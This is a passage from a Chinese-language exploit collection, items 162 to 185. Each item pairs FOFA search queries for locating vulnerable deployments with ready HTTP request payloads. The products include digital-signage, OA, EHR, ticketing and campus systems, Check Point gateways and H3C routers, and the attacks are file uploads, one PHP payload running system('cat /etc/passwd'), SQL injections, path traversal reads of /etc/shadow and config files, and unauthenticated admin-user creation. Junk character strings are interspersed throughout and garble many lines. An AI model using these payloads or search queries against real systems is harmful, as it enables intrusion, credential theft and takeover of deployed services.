& U5 `+ b9 y- y- R<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>. l2 @( V/ a2 M. w% V; a6 C
<tag>3</tag> I* E- m9 u: p2 `! A
</UploadResume>
, b U6 \0 {: l8 X9 r; l</soap:Body>. G i* i+ }8 B+ v/ M- ^
</soap:Envelope>
7 I: g" c# U( d9 ]8 h# z: I4 }/ K) Y- g8 \$ ^7 c
5 N3 D* F% ] `" X9 ?
http://x.x.x.x/dizxdell.aspx
9 H4 l7 p' w5 W, ?0 S" L W$ C
y G% \5 d1 R" M% n$ t162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 U+ c, h1 Z9 P
FOFA: app="和丰山海-数字标牌"- h! }" p* s# f5 N; {8 R2 L0 L
POST /QH.aspx HTTP/1.1! ~# U$ ]; s; i2 }2 z
Host: x.x.x.x
5 Q5 d. k8 S" b9 R2 |2 J& ]9 B9 M9 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 L% b6 Z: e, H5 X9 q/ P1 ]
Connection: close
9 Y% Z. B1 }8 s5 x+ ]7 C7 H5 TContent-Length: 583
; V7 I, b) m( u6 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
( R+ D7 c J, ~" vAccept-Encoding: gzip$ W4 k4 Q: Z( X5 Y* s1 i: [
i7 ]5 I; I2 f# d$ _ I5 T w------WebKitFormBoundaryeegvclmyurlotuey, d/ ^$ k% I' m+ g6 O% `$ Q
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"0 {! e3 p2 B$ q5 P
Content-Type: application/octet-stream
7 X( O+ u. ?/ p. E* e$ R
$ r9 j, B6 h Y9 u s, z# o2 r9 x: K<% response.write("ujidwqfuuqjalgkvrpqy") %>
6 H3 T8 z: |0 x------WebKitFormBoundaryeegvclmyurlotuey3 [. W) O p4 M, X/ |2 p8 [
Content-Disposition: form-data; name="action"
3 `# M" o* D w' |; m0 A: o, c j6 L' M3 }2 Z
upload
2 a h0 v$ O m- ~7 `4 \------WebKitFormBoundaryeegvclmyurlotuey
% Q6 u& d2 b* hContent-Disposition: form-data; name="responderId"0 j2 H X0 @! H9 K4 t
$ ]0 ~8 S6 [" I# L* B% n% e
ResourceNewResponder7 w4 U2 J A1 p
------WebKitFormBoundaryeegvclmyurlotuey
+ t# d8 {; i- }Content-Disposition: form-data; name="remotePath"
3 C: |6 z8 v1 _9 e: U. G7 U5 s) l8 {( ^) d) Q8 S: k
/opt/resources( m6 S0 S9 I/ l+ |
------WebKitFormBoundaryeegvclmyurlotuey--
4 Y1 B$ L. ?: E, g6 b: o4 _7 Q4 T* A1 I5 M
$ w: r. |; i2 K- Shttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
# A3 m X4 b! B/ T% j. z6 c# j, D# i
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传' }5 j3 P+ h3 `) {* L f8 l
FOFA: icon_hash="-795291075"6 X0 U2 O8 [0 R3 i0 e7 s) K
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
) a( V! i+ p& T ?0 \! `Host: x.x.x.x
6 ]2 C! F$ J$ i* d0 N1 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36! g) \* t0 D: u' k0 i
Connection: close
, D. r$ V9 r eContent-Length: 293
/ v7 @% K5 _* C; E' yAccept: */*+ R: y4 l( ]' U8 t; h- T
Accept-Encoding: gzip, deflate
$ K; }5 r2 |# _5 b$ o7 _9 UAccept-Language: zh-CN,zh;q=0.9
5 `# ]* I. L3 b& {6 lContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod" K4 l& g1 Y# g, {" A
) U) v; J" j% Z. H7 A5 S------iiqvnofupvhdyrcoqyuujyetjvqgocod1 c* ~9 N" H. h5 x
Content-Disposition: form-data; name="name"+ T. k2 d/ c! r# ~8 o1 b
# c1 }5 k* n9 p7 B1.php
2 M) {1 [3 a, ]. ^% [" E. G" f------iiqvnofupvhdyrcoqyuujyetjvqgocod8 w! I/ H& ^/ Z" L
Content-Disposition: form-data; name="upfile"; filename="1.php"7 L3 H8 a: E0 {
Content-Type: image/jpeg
5 A: F2 W' E* A! A9 ^$ m8 f0 M; B- n! A) j0 v$ I
rvjhvbhwwuooyiioxega
" W- M- @% N. P7 g+ E- |------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# J- [, r+ A: o7 C4 E$ f2 ?+ w4 s* u+ [$ l8 G) [: k# U3 h
) B, x8 R: ?% X q; p7 f c
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
: Z% ~* q6 h4 m" p* zFOFA: title="智慧综合管理平台登入"* U) f! x0 k ]2 J/ J0 r% T
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
# v6 H9 r6 Z! C# g% ^6 z, T7 LHost: x.x.x.x
" M! l* `3 } R/ s! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
$ B/ i& ]- y2 w7 y% K- ZContent-Length: 288
/ a) H V1 E4 ^% oAccept: application/json, text/javascript, */*; q=0.017 Y& M% |8 a$ ~8 B+ s9 O) k; X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,6 [& E1 e7 ?! Z2 Y2 ^) y/ h
Connection: close
7 m9 v8 L4 _( zContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl% w# F6 O; F0 h( P* |, W
X-Requested-With: XMLHttpRequest4 P; x* O& s1 Y' B9 g( ^
Accept-Encoding: gzip, O1 w" G8 o- E4 C) E, a
* X# l* e4 R- L+ i# L7 l" x8 _
------dqdaieopnozbkapjacdbdthlvtlyl5 D9 h6 R& _+ w+ i. ?: @
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
@+ m+ |+ _! b* i3 ?Content-Type: image/jpeg
, P8 c5 g4 m9 t; s8 j5 b8 t
) \% \# i5 U2 E0 {' U<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
" a# u- K, }3 J* s------dqdaieopnozbkapjacdbdthlvtlyl--
4 L% _" T6 t! F6 w) f
: k( g2 @7 c& k8 T& ]( X; p; s/ V8 i" c2 u5 Z1 s5 v' m. \
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx2 Y& b2 A0 p d1 k+ {- D
* E' _/ ~* n3 \' \7 Y
165. OrangeHRM 3.3.3 SQL 注入1 N8 q3 g% ^# T, f3 F) c
CVE-2024-36428; Z7 Y/ z2 y6 ~, }9 L) f
FOFA: app="OrangeHRM-产品"
5 r# C4 Z7 O, x8 J* |URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))- _6 @+ [& W- _6 W9 e
, m8 S; }$ ~7 ^/ i' V
# k6 E2 ]' z* o$ s" Y166. 中成科信票务管理平台SeatMapHandler SQL注入! f( ~) |! M* o* t5 q5 \
FOFA:body="技术支持:北京中成科信科技发展有限公司"- M7 w! D) y$ }/ C5 b" s* F
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1& m: o9 K, ? A( \' a: R
Host:# E4 `3 C9 k$ ]9 r2 n; F i: w
Pragma: no-cache: p7 `$ H" N j. {
Cache-Control: no-cache
/ I3 p$ G6 j: aUpgrade-Insecure-Requests: 11 I6 U: | r6 `& r c# l2 z( r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# X" I' l$ x* X' A& g4 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 a" I& a D# M8 S3 i m- P
Accept-Encoding: gzip, deflate1 n9 u# y3 p( v# j8 Q6 e
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 K' S0 X& D; `+ Q6 BCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
/ S- b: `/ `0 K- x9 N/ x2 y0 oConnection: close
8 E8 y$ q/ M8 W" ~! s7 |Content-Type: application/x-www-form-urlencoded" s c, Q) [, H$ _) X# U8 x
Content-Length: 89
! N3 G8 b/ Y8 G4 P0 w- l3 d9 B* @8 [9 P/ Q1 M2 h! K
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE8 b( ^3 Z ^: Z
# E. \! o7 e2 ^! F) s4 q# p0 e! X
" @, b+ n2 s( v" F; E8 r. ?
167. 精益价值管理系统 DownLoad.aspx任意文件读取( j4 h( K- X0 i
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
2 N. c9 S z+ e( A* U$ P \; AGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
9 c- T/ r5 H' ]' J0 @( x0 tHost:# y# q' F& [* c `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* h8 b2 e1 u; F- k a$ y
Content-Type: application/x-www-form-urlencoded
7 ~0 b- ]% _- k5 [+ u. tAccept-Encoding: gzip, deflate
5 w3 ]2 R8 w* mAccept: */*
1 k' s. h* X/ x ^. w( z; p( U) HConnection: keep-alive
/ O4 ~1 N u$ Z+ m7 t0 O+ Q: y. U3 z! J3 [" g1 j. F* p+ D" l: i* X v0 \
$ r1 R9 G Y" p& m1 F+ Q+ T6 R
168. 宏景EHR OutputCode 任意文件读取
9 T/ r/ _! y9 t5 w2 d5 E: DFOFA:app="HJSOFT-HCM"
5 l, C9 Z! L) {- _' CGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
( V3 ~8 D l1 d# dHost: your-ip6 o4 j B" v0 s; m1 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36& n$ U" ~6 m. a3 U" c$ }/ Q
Content-Type: application/x-www-form-urlencoded
0 q( q8 c% t8 [0 {% ?( IConnection: close( e1 J) U- J( p! j) N8 H/ H
8 g6 l! g& G) j4 d
8 H8 I _0 q! ?: _: x) G) J9 M
169. 宏景EHR downlawbase SQL注入5 u5 E: D& u! ?: k( }$ e
FOFA:app="HJSOFT-HCM"
$ o% f) D" H" E6 I# _7 i2 aGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
2 `9 o# y8 v5 f& n( u7 ZHost: your-ip
" B/ j5 [; ~. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' w: c7 Q7 H3 IAccept: */*
+ J, x5 O- e. ]6 p3 H- AAccept-Encoding: gzip, deflate6 f A. i$ ^! l0 M. `5 e
Connection: close
* w- V: [) v3 l1 s7 Y
! R" \+ I" l) _" b) H' |- D
) J8 a9 k& \2 x$ x8 p; R. M- \' U! s% U' B
170. 宏景EHR DisplayExcelCustomReport 任意文件读取, f9 Y5 n& l' S. j
FOFA:body="/general/sys/hjaxmanage.js"
; m2 A1 n* E1 T' F& C: Z4 u! HPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
7 @$ t8 a0 [$ p, r2 b! pHost: balalanengliang
; _' X# |$ e+ |* g O: Z6 t4 `User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' e5 Y* J" F4 T7 F
Content-Type: application/x-www-form-urlencoded, a, I$ Y! s7 L
3 I3 a0 ?- X4 }filename=../webapps/ROOT/WEB-INF/web.xml3 n H o" F' U9 H' m* u1 C* f, _
+ c- `5 x) c8 u+ C2 I& z$ O+ n) S! |. i: b( M" {
171. 通天星CMSV6车载定位监控平台 SQL注入
7 J& Q5 ~, f) i) d+ C# l FFOFA:body="/808gps/" |. B2 A4 ?- {3 F+ y
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.14 l# T9 f, k; W; L+ A" \
Host: your-ip; f. x Y" P! {' B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
* }5 _' B( t' WAccept: */*
/ Q2 D8 _0 A- j, w% @: ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
@' L7 S1 A% iAccept-Encoding: gzip, deflate1 D/ Y4 a T, _6 T n" A; Q
Connection: close( T% L# @4 M+ t- u1 ]4 T; e
: F: }# f2 O5 r% [+ t$ E7 ~9 ?/ A! q1 F1 _
* L" k7 f3 o% V172. DT-高清车牌识别摄像机任意文件读取5 Y& o* ~5 u4 r! z' _
FOFA:app="DT-高清车牌识别摄像机"
3 X8 d: B" \. A' ^4 CGET /../../../../etc/passwd HTTP/1.1. s- ^2 p+ M. g; K' l
Host: your-ip
7 c0 H0 o4 r6 [1 B1 d5 i; y( @# @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 d! C2 ~) g. e. Z' IAccept-Encoding: gzip, deflate
- F& G# D3 O$ @6 R" P: @1 { bAccept: */*
% @+ W* \3 {+ {0 ?Connection: keep-alive
5 G6 c- r; E! o, L8 \3 x' w2 ^% E1 j4 b# m- W; Q" V
, c# t/ j$ j; Y
/ T* ]3 D1 \' m1 w+ D3 O F h( J173. Check Point 安全网关任意文件读取( }( u; m& \2 a* m0 `8 H
CVE-2024-24919
: z# U! Y1 {- S+ f+ h O0 AFOFA:app="Check_Point-SSL-Network-Extender"1 M- V9 T* X$ @
POST /clients/MyCRL HTTP/1.1# W6 v: q- U ~8 a
Host: your-ip- x% C* B3 w0 v }# Y, i% o
Content-Type: application/x-www-form-urlencoded
# @* L+ ]1 P8 I4 n
$ c: A7 E0 _2 e" WaCSHELL/../../../../../../../etc/shadow
: O$ K$ d4 e5 ?' E3 A. t
# F& a$ M0 `; d
4 s: @2 b \* X! T! S# [/ q% i4 z" a8 F2 f9 q
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
# n% k1 a# i: U+ IFOFA:app="金和网络-金和OA"
* R; A$ w9 j- N& L- k' R+ j/ SGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
. H/ h! c1 }8 g% h5 P/ XHost: your-ip; V* F i* y" p5 O/ |/ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) T/ r* U1 }# o M+ QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 B3 n. Q; b! I+ W0 I7 v6 l! b2 jAccept-Encoding: gzip, deflate, br
6 i3 }" v7 y# O5 NAccept-Language: zh-CN,zh;q=0.9* }% J$ {' Y7 H, R/ y% Q) h6 T
Connection: close
, L2 L$ @# m& o9 z
8 Y- u+ R- S% j% _& T4 x0 n7 k, \9 z
* J6 u9 q5 Y# }8 ^0 A1 l* i175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
, f' y& I0 ~! S" lFOFA:app="金和网络-金和OA"
7 @0 r# G& m, u. K; jGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
6 r5 u7 m8 _5 a7 q' G7 p7 E4 D- ~7 f+ rHost:' D0 A) {5 Y/ U
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 @- C. s b3 s' E1 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# |3 r6 e( x, G% s& p* B, VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 K/ [& {3 i3 _: t- @! {5 M
Accept-Encoding: gzip, deflate
) D; X/ ~! I5 U$ E H: \Connection: close7 c* b y- V$ V) L
Upgrade-Insecure-Requests: 12 K* E# V" l8 e( V% F
* X: H* s: b6 w) g/ d/ P- C) e/ ^& V5 k
176. 电信网关配置管理系统 rewrite.php 文件上传2 T1 w/ G; Q) u, q! p
FOFA:body="img/login_bg3.png" && body="系统登录"0 A# M6 U5 t4 @$ {, y0 y
POST /manager/teletext/material/rewrite.php HTTP/1.1
- `9 K. D' J+ R: q' lHost: your-ip9 w) G1 ^6 p! H% N6 q+ x5 q& F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- x; G) C5 m Z% D* S+ h) _3 G x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT$ A- m) p# ~ b" l) [; l
Connection: close
6 h7 L k) h, k# k7 i; }
, |% n/ X! H6 k------WebKitFormBoundaryOKldnDPT
7 p+ x1 U5 }& l# I; I! E; OContent-Disposition: form-data; name="tmp_name"; filename="test.php"
& u; \; N+ G3 ?$ tContent-Type: image/png
5 @# \9 w4 u5 I0 s: F 8 Q8 v' z+ f' F1 g4 B0 D
<?php system("cat /etc/passwd");unlink(__FILE__);?>: Q7 t' d9 h+ m$ _: j2 d
------WebKitFormBoundaryOKldnDPT
! V, u" ?% v! n l, E5 uContent-Disposition: form-data; name="uploadtime". c: A6 ]3 k# J
! {$ h; p4 J2 D6 U# H8 N
% a+ i& U* W" i: E% {: x
------WebKitFormBoundaryOKldnDPT--
/ P% N) F1 [7 E, ]. @7 P
5 T0 A) j/ z2 z0 K' W* S. r
# [. L. \* x. x% L0 k) c/ T( q- S7 F! A" ?; c. b
177. H3C路由器敏感信息泄露
- z( k7 K+ g+ b/ Y6 D6 f' n' U/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
8 W* s/ C4 n0 k# s1 `& s, W( K( g: a: O8 Z/userLogin.asp/../actionpolicy_status/../M60.cfg
& \' Y8 C5 t% x: |. i/userLogin.asp/../actionpolicy_status/../GR8300.cfg
# \1 J2 Y4 R+ O/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( U# e6 j7 X! E9 ]" i; P/userLogin.asp/../actionpolicy_status/../GR3200.cfg
7 n5 z% g: }/ a/userLogin.asp/../actionpolicy_status/../GR2200.cfg
1 I* Y% _- ~' C+ t, |/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
) H: Z; c- B( \- ~/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 P7 F& L# j: v( n' ]( Q: X- n/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 A' B7 o6 Q1 o( Q- z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
) J* ]2 r4 O/ \3 y" w/userLogin.asp/../actionpolicy_status/../ER5200.cfg7 a+ ]( l/ A, N+ O/ q9 w& [8 `
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
3 ^: H9 \; ]: p9 u- g" L. }/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
) \7 K o& H6 p! B; Y/userLogin.asp/../actionpolicy_status/../ER3260.cfg
8 _0 K: } e9 A4 q$ m7 T1 u8 ^/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
; g) c7 t7 r% z+ z! Y+ p( o3 A# g4 P2 |/userLogin.asp/../actionpolicy_status/../ER3200.cfg: w+ _; m6 _0 T6 \' d1 r3 j
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
$ P! y- o" l9 Q/ V/userLogin.asp/../actionpolicy_status/../ER3108G.cfg q; D& \. k" U/ U6 Z7 B" x* O) M$ c
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg5 S$ ], }! p5 ?% d( D$ R* z
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
4 r% _$ I, k- B1 H; a/ G& j3 o E/ F8 Z+ b/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg! N/ I8 C( f" _1 J# q* L3 Y5 T$ M
# s7 }8 L" G3 i% Y8 T# D% C, y) ?; P
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
# _2 ?$ P) V, C0 x8 ^" I# RFOFA:header="/selfservice"2 X7 p$ B. P/ r" ?9 |, v; Y
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
( P+ w7 w8 E; bHost:
+ E; [2 J! g1 E3 Z" k2 ]& T, m5 S4 p8 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! W0 H( S. N4 s. n9 h* aContent-Length: 252
8 G" L- k$ u3 zAccept-Encoding: gzip, deflate
6 A: a- Y3 x6 T0 S, ~Connection: close
3 g/ @+ T. F l! s/ P) X. TContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
$ _( [) ~: d& E: q-----------------aqutkea7vvanpqy3rh2l" v2 Q6 x" k6 _* W: g6 n9 K
Content-Disposition: form-data; name="12234.txt"; filename="12234"2 D: v9 @4 x- E0 N
Content-Type: application/octet-stream
. D5 f& @0 x- UContent-Length: 255
# S' C5 {) b7 G1 G2 z/ X( \
. ^3 a& v) h( M0 g6 S7 b122349 \* \6 F* o5 x2 H0 Q" E5 T
-----------------aqutkea7vvanpqy3rh2l--
" t6 p- t& _2 ~& U+ |* O+ J5 E9 ]+ w' E
# {3 o( M) g0 i, P$ q) a9 c- `7 p4 XGET /imc/primepush/%2e%2e/flex/12234.txt( A" K1 t/ K4 Y" A0 e9 o1 m
+ A' L. A% ?# d# h
( j% W, f* n3 i% o: o* b4 u7 T
179. 建文工程管理系统存在任意文件读取! e6 h# l7 @7 [
POST /Common/DownLoad2.aspx HTTP/1.1
3 b1 u9 x: V( ?/ p. m5 e4 lHost: {{Hostname}}7 }) V+ Q1 R& j; `# Z5 _8 l& o
Content-Type: application/x-www-form-urlencoded' b J8 ^3 ?! C% M7 B
User-Agent: Mozilla/5.0+ n7 z0 |' g) W- \3 ^0 F2 \& T1 _
N* j2 B, y" o, [% Ypath=../log4net.config&Name=
* T$ f/ x0 U9 h" g7 O8 m( s0 s. z8 Y! g$ y, s$ f. ?
6 n; ]4 I( N6 x* a180. 帮管客 CRM jiliyu SQL注入8 F( I7 I$ q) L {* z* [9 U" _
FOFA:app="帮管客-CRM"( w* `4 z- A# [; T% B
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1- x3 T2 W* a3 J+ B; F8 f" W- g# x
Host: your-ip
& r# \% e! p4 \- E6 i! {0 u3 Z- PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( m- W5 i/ [7 g! O) S" {; q. @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 Z5 _/ {; }5 O( X% b& s$ BAccept-Encoding: gzip, deflate
- D* ~9 K7 T' P M5 Q @6 F: @Accept-Language: zh-CN,zh;q=0.9
0 q6 E, D; Y4 b. @* r+ rConnection: close* W: _8 J) ~6 E. E
: P! o8 k% `9 u @- F: s9 i
% m/ f2 B' `6 C4 w181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* g* V& o9 u6 ~: c0 rFOFA:"PDCA/js/_publicCom.js"& k8 g2 u& n! ?7 O* k0 {
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
9 ~8 H7 z) B/ U5 nHost: your-ip. f5 c7 Q. t2 t6 F2 k& M. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36; i# c0 t+ Y2 k' `9 j; c. p Y$ ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" u5 S' H* h" ]/ x% Z" ~" ^: WAccept-Encoding: gzip, deflate, br0 u* g' m' F5 A
Accept-Language: zh-CN,zh;q=0.91 Z2 H; v' I+ g E; k9 i- j' r
Connection: close
5 V8 g! ~1 k! A) m8 `Content-Type: application/x-www-form-urlencoded
6 _5 |( T1 d# B% ]7 Z9 Z/ y" K9 l$ W
: w" }* L# V/ _0 ~; F! T. eaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
. [/ M* r/ R- ?3 ~. D g r3 y5 L, h( x& ^3 s+ Y" E
T- P6 Z ?2 A: _2 o/ U7 J) Y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 d4 w2 Q+ \" W4 u" W2 T
FOFA:"PDCA/js/_publicCom.js"
5 K B8 Z# s. GPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
4 o7 r( t0 d5 s B1 zHost: your-ip
! `$ y6 g q! J- @& C- XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' k$ O# ?7 t% o6 s$ g( D: F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ u9 P' u7 y9 S, u& N, w4 R0 f, r7 x1 LAccept-Encoding: gzip, deflate, br3 p$ ^" r$ [) f
Accept-Language: zh-CN,zh;q=0.9
; N. u: y Y+ F7 M! ?# |: Y/ _3 WConnection: close
% Q/ J' C: p$ {- H4 \ ~( VContent-Type: application/x-www-form-urlencoded
) T9 F, J: }& C" U* R+ Z; o7 Q
+ z- g$ Q7 d$ I( {2 p& i7 ^) C; t% g/ O
username=test1234&pwd=test1234&savedays=15 m: b9 S. q* I
! ^$ a8 d7 K: g( X: `8 Q0 ~
7 U+ U, I1 [1 j4 A; k/ W
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 ~' m6 [/ _; [5 @
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"$ o- X# }# ^1 F+ U+ k( }* Q0 D D
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
% K1 y# H& S! c- d5 dHost: your-ip& o- l% `# N- h3 D" h2 ~" V2 m
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ g* g' y+ f$ h4 A9 M) n- C
Accept-Charset: utf-8; z% D8 ~% _/ W7 }& _
Accept-Encoding: gzip, deflate$ A2 D! G. ~- H% d
Connection: close
4 l0 v" U5 j1 ^, j7 ]3 l
3 W; q" u$ S F3 |: Z6 s9 H" i A6 {$ k9 `( I3 _( r
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加' K( G2 g0 O& j) n$ [7 T! M0 C
FOFA:server="SunFull-Webs". o4 h" U' C# n: h0 w
POST /soap/AddUser HTTP/1.1
8 ~3 \( y" U! j. \9 E( ^Host: your-ip
( F" v3 S" v0 s$ }9 Y3 {Accept-Encoding: gzip, deflate
' V5 _% ?# a; Y3 c& R( s+ a: NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 y- f8 f z; G8 p: X8 zAccept: application/xml, text/xml, */*; q=0.01
! B# Q; X9 F+ _& @" {% I! HContent-Type: text/xml; charset=utf-8
1 A6 _! e4 `4 @: W! `) w3 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 F/ Y, r: R2 jX-Requested-With: XMLHttpRequest) I" ^/ a: y; u1 G) n$ E# E5 V( D
4 F% {8 v+ h3 U, [+ f' F
% s/ I& p2 W) h# f Pinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')/ j: i; N" V6 z9 g7 `
' J% ^+ p D" I2 y5 P y' z, W$ f
" \. X2 P: f- ?
185. 瑞友天翼应用虚拟化系统SQL注入
* I; s$ u3 | s3 [version < 7.0.5.1
1 b9 G2 S: V% G+ m1 _) D3 ]FOFA:app="REALOR-天翼应用虚拟化系统"
